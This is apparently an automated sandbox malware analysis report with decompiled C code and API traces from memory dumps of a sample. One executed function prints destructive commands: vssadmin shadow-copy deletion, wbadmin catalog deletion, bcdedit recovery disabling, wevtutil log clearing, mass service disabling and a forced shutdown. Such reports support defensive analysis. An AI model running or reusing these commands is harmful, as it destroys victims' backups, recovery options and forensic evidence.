    							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
    						}
    					}
    					L14:
    					E00C59BA7(_t66);
    					goto L15;
    				}
    				_t20 = _t54 + 8; // 0x8
    				asm("sbb eax, eax");
    				_t48 = _t40 & _t20;
    				_t21 = _t54 + 8; // 0x8
    				_t62 = _t21;
    				if((_t40 & _t20) > 0x400) {
    					asm("sbb eax, eax");
    					_t66 = E00C561AB(_t62, _t48 & _t62);
    					if(_t66 == 0) {
    						goto L14;
    					}
    					 *_t66 = 0xdddd;
    					L9:
    					_t66 =  &(_t66[4]);
    					goto L11;
    				}
    				asm("sbb eax, eax");
    				E00C5DD20();
    				_t66 = _t68;
    				if(_t66 == 0) {
    					goto L14;
    				}
    				 *_t66 = 0xcccc;
    				goto L9;
    			}
    0x00c59a92
    0x00c59a99
    0x00c59aa5
    0x00c59aaa
    0x00c59aaf
    0x00c59ab4
    0x00c59ab7
    0x00c59ab9
    0x00c59ab9
    0x00c59abe
    0x00c59ad7
    0x00c59add
    0x00c59ae2
    0x00c59b81
    0x00c59b85
    0x00c59b8a
    0x00c59b8a
    0x00c59ba6
    0x00c59ba6
    0x00c59ae8
    0x00c59aeb
    0x00c59af0
    0x00c59af4
    0x00c59b40
    0x00c59b42
    0x00c59b44
    0x00c59b49
    0x00c59b60
    0x00c59b68
    0x00c59b78
    0x00c59b78
    0x00c59b68
    0x00c59b7a
    0x00c59b7b
    0x00000000
    0x00c59b80
    0x00c59af6
    0x00c59afb
    0x00c59afd
    0x00c59aff
    0x00c59aff
    0x00c59b07
    0x00c59b24
    0x00c59b2e
    0x00c59b33
    0x00000000
    0x00000000
    0x00c59b35
    0x00c59b3b
    0x00c59b3b
    0x00000000
    0x00c59b3b
    0x00c59b0b
    0x00c59b0f
    0x00c59b14
    0x00c59b18
    0x00000000
    0x00000000
    0x00c59b1a
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 00C59AD7
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C59B60
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C59B72
    • __freea.LIBCMT ref: 00C59B7B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 93%
    			E10009A3E() {
    				int _v8;
    				void* __ecx;
    				void* _t6;
    				int _t7;
    				char* _t13;
    				int _t17;
    				void* _t19;
    				char* _t25;
    				WCHAR* _t27;
    
    				_t27 = GetEnvironmentStringsW();
    				if(_t27 == 0) {
    					L7:
    					_t13 = 0;
    				} else {
    					_t6 = E10009A07(_t27);
    					_pop(_t19);
    					_t17 = _t6 - _t27 >> 1;
    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
    					_v8 = _t7;
    					if(_t7 == 0) {
    						goto L7;
    					} else {
    						_t25 = E10005DA1(_t19, _t7);
    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
    							_t13 = 0;
    						} else {
    							_t13 = _t25;
    							_t25 = 0;
    						}
    						E10005D67(_t25);
    					}
    				}
    				if(_t27 != 0) {
    					FreeEnvironmentStringsW(_t27);
    				}
    				return _t13;
    			}
    0x10009a4d
    0x10009a53
    0x10009aab
    0x10009aab
    0x10009a55
    0x10009a56
    0x10009a5b
    0x10009a64
    0x10009a6a
    0x10009a70
    0x10009a75
    0x00000000
    0x10009a77
    0x10009a7d
    0x10009a82
    0x10009aa0
    0x10009a9a
    0x10009a9a
    0x10009a9c
    0x10009a9c
    0x10009aa3
    0x10009aa8
    0x10009a75
    0x10009aaf
    0x10009ab2
    0x10009ab2
    0x10009ac0

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 10009A47
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10009A6A
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10009A90
      • Part of subcall function 10005D67: HeapFree.KERNEL32(00000000,00000000), ref: 10005D7D
      • Part of subcall function 10005D67: GetLastError.KERNEL32(26C1DB24,?,100059D4,00000001,00000001), ref: 10005D8F
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10009AB2
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C5193F() {
    				signed int _v8;
    				struct _FILETIME _v16;
    				signed int _v20;
    				union _LARGE_INTEGER _v24;
    				signed int _t21;
    				signed int _t29;
    				signed int _t32;
    				signed int _t36;
    
    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
    				_t21 =  *0xc6a004; // 0x26d30358
    				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
    					GetSystemTimeAsFileTime( &_v16);
    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
    					_v8 = _v8 ^ GetCurrentThreadId();
    					_v8 = _v8 ^ GetCurrentProcessId();
    					QueryPerformanceCounter( &_v24);
    					_t29 =  &_v8;
    					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
    					if(_t36 != 0xbb40e64e) {
    						if((0xffff0000 & _t36) == 0) {
    							_t29 = (_t36 | 0x00004711) << 0x10;
    							_t36 = _t36 | _t29;
    						}
    					} else {
    						_t36 = 0xbb40e64f;
    					}
    					 *0xc6a004 = _t36;
    					 *0xc6a000 =  !_t36;
    					return _t29;
    				} else {
    					_t32 =  !_t21;
    					 *0xc6a000 = _t32;
    					return _t32;
    				}
    			}
    0x00c51945
    0x00c51949
    0x00c5194d
    0x00c51960
    0x00c51973
    0x00c5197f
    0x00c51988
    0x00c51991
    0x00c51998
    0x00c519a1
    0x00c519aa
    0x00c519ae
    0x00c519b9
    0x00c519c2
    0x00c519c5
    0x00c519c5
    0x00c519b0
    0x00c519b0
    0x00c519b0
    0x00c519c7
    0x00c519cf
    0x00000000
    0x00c51966
    0x00c51966
    0x00c51968
    0x00000000
    0x00c51968

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C51973
    • GetCurrentThreadId.KERNEL32 ref: 00C51982
    • GetCurrentProcessId.KERNEL32 ref: 00C5198B
    • QueryPerformanceCounter.KERNEL32(?), ref: 00C51998
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 100%
    			E100016BE() {
    				signed int _v8;
    				struct _FILETIME _v16;
    				signed int _v20;
    				union _LARGE_INTEGER _v24;
    				signed int _t21;
    				signed int _t29;
    				signed int _t32;
    				signed int _t36;
    
    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
    				_t21 =  *0x1001d018; // 0x26c1db24
    				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
    					GetSystemTimeAsFileTime( &_v16);
    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
    					_v8 = _v8 ^ GetCurrentThreadId();
    					_v8 = _v8 ^ GetCurrentProcessId();
    					QueryPerformanceCounter( &_v24);
    					_t29 =  &_v8;
    					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
    					if(_t36 != 0xbb40e64e) {
    						if((0xffff0000 & _t36) == 0) {
    							_t29 = (_t36 | 0x00004711) << 0x10;
    							_t36 = _t36 | _t29;
    						}
    					} else {
    						_t36 = 0xbb40e64f;
    					}
    					 *0x1001d018 = _t36;
    					 *0x1001d014 =  !_t36;
    					return _t29;
    				} else {
    					_t32 =  !_t21;
    					 *0x1001d014 = _t32;
    					return _t32;
    				}
    			}
    0x100016c4
    0x100016c8
    0x100016cc
    0x100016df
    0x100016f2
    0x100016fe
    0x10001707
    0x10001710
    0x10001717
    0x10001720
    0x10001729
    0x1000172d
    0x10001738
    0x10001741
    0x10001744
    0x10001744
    0x1000172f
    0x1000172f
    0x1000172f
    0x10001746
    0x1000174e
    0x00000000
    0x100016e5
    0x100016e5
    0x100016e7
    0x00000000
    0x100016e7

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 100016F2
    • GetCurrentThreadId.KERNEL32 ref: 10001701
    • GetCurrentProcessId.KERNEL32 ref: 1000170A
    • QueryPerformanceCounter.KERNEL32(?), ref: 10001717
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 94%
    			E100133A0(intOrPtr* __ecx, char __edx, intOrPtr _a8) {
    				void* _v8;
    				signed short _v10;
    				void* _v16;
    				signed short _v18;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				void* _v36;
    				intOrPtr _v40;
    				char _v44;
    				void* _v48;
    				void* _v52;
    				intOrPtr _v56;
    				char _v60;
    				void* _v64;
    				void* _v68;
    				char* _v72;
    				void* _v76;
    				char* _v80;
    				void* _v84;
    				intOrPtr _v88;
    				char _v92;
    				void* _v96;
    				char _v100;
    				void* _t56;
    				void* _t58;
    				char _t59;
    				void* _t61;
    				intOrPtr _t62;
    				signed short _t65;
    				void* _t67;
    				void* _t69;
    				signed short _t73;
    				void* _t75;
    				void* _t77;
    				void* _t85;
    				void* _t87;
    				intOrPtr _t96;
    				intOrPtr* _t98;
    				signed int _t100;
    				void* _t102;
    
    				_t102 = (_t100 & 0xfffffff8) - 0x60;
    				_v92 = 0;
    				_v88 = 0x1001f2d0;
    				_v100 = __edx;
    				_t98 = __ecx;
    				_t56 =  *__ecx;
    				_v96 = _t56;
    				if(__edx == 0) {
    					L19:
    					return _t56;
    				} else {
    					_t96 = _a8;
    					do {
    						_v92 =  &_v36;
    						_t58 = E10014010( &_v92,  &_v100, 0xc);
    						_t102 = _t102 + 4;
    						if(_t58 == 0) {
    							_t56 = _v100;
    							goto L18;
    						}
    						_t59 = _v28;
    						_v100 = _t59;
    						if(_t59 == 0) {
    							L16:
    							_t56 = _v36;
    							_v100 = _t56;
    							goto L18;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_v92 =  &_v24;
    							_t61 = E10014010( &_v92,  &_v100, 0x14);
    							_t102 = _t102 + 4;
    							if(_t61 == 0) {
    								goto L15;
    							}
    							_t85 = _v8;
    							_v80 =  &_v68;
    							_v100 = _t85;
    							_v68 = 0;
    							_v64 = 0;
    							_v84 = 0;
    							_v60 = _t85;
    							_v56 =  *_t98;
    							_v8 = 0;
    							if(_t85 == 0) {
    								goto L15;
    							}
    							_t65 = _v10;
    							if(_t65 == 0) {
    								goto L15;
    							}
    							_t67 = LocalAlloc(0x40, _t65 & 0x0000ffff);
    							_v84 = _t67;
    							if(_t67 == 0) {
    								goto L15;
    							}
    							_v8 = _t67;
    							_t69 = E10014010( &_v84,  &_v60, _v10 & 0x0000ffff);
    							_t102 = _t102 + 4;
    							if(_t69 == 0) {
    								goto L15;
    							}
    							_t87 = _v16;
    							_v72 =  &_v52;
    							_v52 = 0;
    							_v48 = 0;
    							_v76 = 0;
    							_v44 = _t87;
    							_v40 =  *_t98;
    							_v16 = 0;
    							if(_t87 != 0) {
    								_t73 = _v18;
    								if(_t73 != 0) {
    									_t75 = LocalAlloc(0x40, _t73 & 0x0000ffff);
    									_v76 = _t75;
    									if(_t75 != 0) {
    										_v16 = _t75;
    										_t77 = E10014010( &_v76,  &_v44, _v18 & 0x0000ffff);
    										_t102 = _t102 + 4;
    										if(_t77 != 0) {
    											_push(_t96);
    											_push( &_v100);
    											_push(_v32);
    											_push( &_v24);
    											E10013580( &_v24, _t98);
    											LocalFree(_v36);
    										}
    									}
    								}
    							}
    							LocalFree(_v8);
    							L15:
    							_t62 = _v24;
    							_v100 = _t62;
    						} while (_t62 != 0);
    						goto L16;
    						L18:
    					} while (_t56 != 0);
    					goto L19;
    				}
    			}

    APIs
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001347B
    • LocalAlloc.KERNEL32(00000040,?), ref: 100134F9
      • Part of subcall function 10013580: RtlEqualString.NTDLL(?,1001ADE8,00000000), ref: 10013597
      • Part of subcall function 10013580: RtlEqualString.NTDLL(?,1001A8F4,00000000), ref: 100135B0
    • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 1001353E
    • LocalFree.KERNEL32(?), ref: 10013548
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 100%
    			E001412E8() {
    				int _v8;
    				int _v12;
    				int _v16;
    				struct _QUERY_SERVICE_CONFIG* _v20;
    				void* _v24;
    				short** _v28;
    				short* _v32;
    				void* _v36;
    				int _v40;
    				void* _v44;
    				void* _t43;
    				struct _ENUM_SERVICE_STATUS* _t46;
    				void* _t53;
    				void* _t57;
    
    				_t43 = OpenSCManagerW(0, L"ServicesActive", 0x80000000); // executed
    				_v36 = _t43;
    				if(_t43 != 0) {
    					_v8 = 0;
    					_v16 = 0;
    					_v40 = 0;
    					EnumServicesStatusW(_t43, 0x13f, 3, 0, 0,  &_v8,  &_v16,  &_v40);
    					_t46 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
    					_v44 = _t46;
    					if(EnumServicesStatusW(_v36, 0x13f, 3, _t46, _v8,  &_v8,  &_v16,  &_v40) == 0) {
    						L10:
    						return CloseServiceHandle(_v36);
    					}
    					_v32 = 0;
    					if(_v16 <= 0) {
    						L9:
    						HeapFree(GetProcessHeap(), 8, _v44);
    						goto L10;
    					}
    					_v28 = _v44;
    					do {
    						_t53 = OpenServiceW(_v36,  *_v28, 0x10000000); // executed
    						_v24 = _t53;
    						if(_t53 != 0) {
    							_v12 = 0;
    							QueryServiceConfigW(_t53, 0, 0,  &_v12);
    							_t57 = HeapAlloc(GetProcessHeap(), 8, _v12); // executed
    							_v20 = _t57;
    							ChangeServiceConfigW(_v24, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
    							if(QueryServiceConfigW(_v24, _v20, _v12,  &_v12) != 0) {
    								PathRemoveArgsW( *(_v20 + 0xc));
    							}
    							HeapFree(GetProcessHeap(), 8, _v20);
    							GetLastError();
    							CloseServiceHandle(_v24);
    						}
    						_v32 = _v32 + 1;
    						_v28 =  &(_v28[9]);
    					} while (_v32 < _v16);
    					goto L9;
    				}
    				return _t43;
    			}

    APIs
    • OpenSCManagerW.SECHOST(00000000,ServicesActive,80000000), ref: 001412FC
    • EnumServicesStatusW.ADVAPI32(00000000,0000013F,00000003,00000000,00000000,?,?,?), ref: 00141334
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00141341
    • RtlAllocateHeap.NTDLL(00000000), ref: 00141344
    • EnumServicesStatusW.ADVAPI32(?,0000013F,00000003,00000000,?,?,?,?), ref: 00141367
    • OpenServiceW.SECHOST(?,?,10000000), ref: 00141396
    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 001413AD
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001413B4
    • HeapAlloc.KERNEL32(00000000), ref: 001413B7
    • ChangeServiceConfigW.ADVAPI32(?,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001413D0
    • QueryServiceConfigW.ADVAPI32(?,?,?,?), ref: 001413E3
    • PathRemoveArgsW.SHLWAPI(?), ref: 001413EF
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001413FA
    • HeapFree.KERNEL32(00000000), ref: 001413FD
    • GetLastError.KERNEL32 ref: 00141403
    • CloseServiceHandle.ADVAPI32(?), ref: 0014140C
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0014142A
    • HeapFree.KERNEL32(00000000), ref: 0014142D
    • CloseServiceHandle.ADVAPI32(?), ref: 00141436
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 72%
    			E001416E9() {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v24;
    				char _v28;
    				void* _v32;
    				struct _LUID _v40;
    				signed int _t15;
    				void* _t33;
    				void* _t40;
    				signed int _t42;
    				intOrPtr* _t43;
    
    				_t15 =  *0x149004; // 0x20251455
    				_v8 = _t15 ^ _t42;
    				_v28 = 0;
    				__imp__Wow64DisableWow64FsRedirection();
    				LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &_v40); // executed
    				_v24.Privileges = _v40.LowPart;
    				_v24.PrivilegeCount = 1;
    				_v16 = _v40.HighPart;
    				_v12 = 2;
    				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v32);
    				AdjustTokenPrivileges(_v32, 0,  &_v24, 0x10, 0, 0); // executed
    				E00141000(L"c:\\Windows\\system32\\vssadmin.exe", L"delete shadows /all /quiet"); // executed
    				 *_t43 = L"delete catalog -quiet"; // executed
    				E00141000(L"wbadmin.exe",  &_v28); // executed
    				 *_t43 = L"/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"; // executed
    				E00141000(L"bcdedit.exe", _t40); // executed
    				 *_t43 = L"cl System"; // executed
    				E00141000(L"wevtutil.exe", _t33); // executed
    				 *_t43 = L"cl Security"; // executed
    				E00141000(L"wevtutil.exe"); // executed
    				__imp__Wow64RevertWow64FsRedirection(_v28); // executed
    				E001412E8(); // executed
    				CreateThread(0, 0, E001416BF, 0, 0, 0); // executed
    				Sleep(0x36ee80); // executed
    				__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 0, 0x50000); // executed
    				ExitProcess(0);
    			}

    APIs
    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00141704
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00141714
    • GetCurrentProcess.KERNEL32 ref: 00141734
    • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00141741
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 00141753
      • Part of subcall function 00141000: wsprintfW.USER32 ref: 00141072
      • Part of subcall function 00141000: GetSystemDirectoryW.KERNEL32(?,00000410), ref: 00141087
      • Part of subcall function 00141000: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001410A9
      • Part of subcall function 00141000: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001410BB
      • Part of subcall function 00141000: CloseHandle.KERNEL32(?), ref: 001410CD
      • Part of subcall function 00141000: CloseHandle.KERNEL32(?), ref: 001410D5
    • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 001417AB
      • Part of subcall function 001412E8: OpenSCManagerW.SECHOST(00000000,ServicesActive,80000000), ref: 001412FC
      • Part of subcall function 001412E8: EnumServicesStatusW.ADVAPI32(00000000,0000013F,00000003,00000000,00000000,?,?,?), ref: 00141334
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 00141341
      • Part of subcall function 001412E8: RtlAllocateHeap.NTDLL(00000000), ref: 00141344
      • Part of subcall function 001412E8: EnumServicesStatusW.ADVAPI32(?,0000013F,00000003,00000000,?,?,?,?), ref: 00141367
      • Part of subcall function 001412E8: OpenServiceW.SECHOST(?,?,10000000), ref: 00141396
      • Part of subcall function 001412E8: QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 001413AD
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 001413B4
      • Part of subcall function 001412E8: HeapAlloc.KERNEL32(00000000), ref: 001413B7
      • Part of subcall function 001412E8: ChangeServiceConfigW.ADVAPI32(?,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001413D0
      • Part of subcall function 001412E8: QueryServiceConfigW.ADVAPI32(?,?,?,?), ref: 001413E3
      • Part of subcall function 001412E8: PathRemoveArgsW.SHLWAPI(?), ref: 001413EF
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 001413FA
      • Part of subcall function 001412E8: HeapFree.KERNEL32(00000000), ref: 001413FD
      • Part of subcall function 001412E8: GetLastError.KERNEL32 ref: 00141403
      • Part of subcall function 001412E8: CloseServiceHandle.ADVAPI32(?), ref: 0014140C
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 0014142A
      • Part of subcall function 001412E8: HeapFree.KERNEL32(00000000), ref: 0014142D
      • Part of subcall function 001412E8: CloseServiceHandle.ADVAPI32(?), ref: 00141436
    • CreateThread.KERNEL32(00000000,00000000,Function_000016BF,00000000,00000000,00000000), ref: 001417C0
    • Sleep.KERNELBASE(0036EE80), ref: 001417CB
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00050000), ref: 001417DC
    • ExitProcess.KERNEL32 ref: 001417E3
    Strings
    • wbadmin.exe, xrefs: 00141768
    • bcdedit.exe, xrefs: 00141779
    • delete shadows /all /quiet, xrefs: 00141759
    • delete catalog -quiet, xrefs: 0014176D
    • cl System, xrefs: 0014178F
    • /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no, xrefs: 0014177E
    • SeShutdownPrivilege, xrefs: 0014170E
    • wevtutil.exe, xrefs: 0014178A
    • c:\Windows\system32\vssadmin.exe, xrefs: 0014175E
    • cl Security, xrefs: 0014179B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Control-flow Graph

    C-Code - Quality: 51%
    			E00142AE3(void* __ebx, void* __edx) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t7;
    				long _t10;
    				void* _t11;
    				int _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t18;
    				intOrPtr* _t20;
    				intOrPtr _t21;
    				intOrPtr* _t23;
    				long _t26;
    				void* _t30;
    				void* _t35;
    				struct HINSTANCE__* _t36;
    				intOrPtr* _t37;
    				void* _t40;
    				intOrPtr* _t42;
    				void* _t43;
    
    				_t35 = __edx;
    				_t30 = __ebx;
    				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
    				if(_t36 != 0) {
    					 *0x14a5b8 = GetProcAddress(_t36, "FlsAlloc");
    					 *0x14a5bc = GetProcAddress(_t36, "FlsGetValue");
    					 *0x14a5c0 = GetProcAddress(_t36, "FlsSetValue");
    					_t7 = GetProcAddress(_t36, "FlsFree");
    					__eflags =  *0x14a5b8;
    					_t40 = TlsSetValue;
    					 *0x14a5c4 = _t7;
    					if( *0x14a5b8 == 0) {
    						L6:
    						 *0x14a5bc = TlsGetValue;
    						 *0x14a5b8 = 0x1427f3;
    						 *0x14a5c0 = _t40;
    						 *0x14a5c4 = TlsFree;
    					} else {
    						__eflags =  *0x14a5bc;
    						if( *0x14a5bc == 0) {
    							goto L6;
    						} else {
    							__eflags =  *0x14a5c0;
    							if( *0x14a5c0 == 0) {
    								goto L6;
    							} else {
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    					_t10 = TlsAlloc();
    					 *0x149054 = _t10;
    					__eflags = _t10 - 0xffffffff;
    					if(_t10 == 0xffffffff) {
    						L15:
    						_t11 = 0;
    						__eflags = 0;
    					} else {
    						_t12 = TlsSetValue(_t10,  *0x14a5bc);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L15;
    						} else {
    							E00141B44();
    							_t42 = __imp__EncodePointer; // executed
    							_t14 =  *_t42( *0x14a5b8); // executed
    							 *0x14a5b8 = _t14; // executed
    							_t15 =  *_t42( *0x14a5bc); // executed
    							 *0x14a5bc = _t15; // executed
    							_t16 =  *_t42( *0x14a5c0); // executed
    							 *0x14a5c0 = _t16; // executed
    							_t17 =  *_t42( *0x14a5c4); // executed
    							 *0x14a5c4 = _t17;
    							_t18 = E00142F5C();
    							__eflags = _t18;
    							if(_t18 == 0) {
    								L14:
    								E00142830();
    								goto L15;
    							} else {
    								_t37 = __imp__DecodePointer;
    								_t20 =  *_t37( *0x14a5b8, E001429B4); // executed
    								_t21 =  *_t20();
    								 *0x149050 = _t21;
    								__eflags = _t21 - 0xffffffff;
    								if(_t21 == 0xffffffff) {
    									goto L14;
    								} else {
    									_t43 = E001444AD(1, 0x214);
    									__eflags = _t43;
    									if(_t43 == 0) {
    										goto L14;
    									} else {
    										_t23 =  *_t37( *0x14a5c0,  *0x149050, _t43); // executed
    										__eflags =  *_t23();
    										if(__eflags == 0) {
    											goto L14;
    										} else {
    											_push(0);
    											_push(_t43);
    											E0014286D(_t30, _t35, _t37, _t43, __eflags);
    											_t26 = GetCurrentThreadId();
    											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
    											 *_t43 = _t26;
    											_t11 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t11;
    				} else {
    					E00142830();
    					return 0;
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001418AC), ref: 00142AEB
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,001418AC), ref: 00142B0D
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,001418AC), ref: 00142B1A
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,001418AC), ref: 00142B27
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,001418AC), ref: 00142B34
    • TlsAlloc.KERNEL32(?,001418AC), ref: 00142B84
    • TlsSetValue.KERNEL32(00000000,?,001418AC), ref: 00142B9F
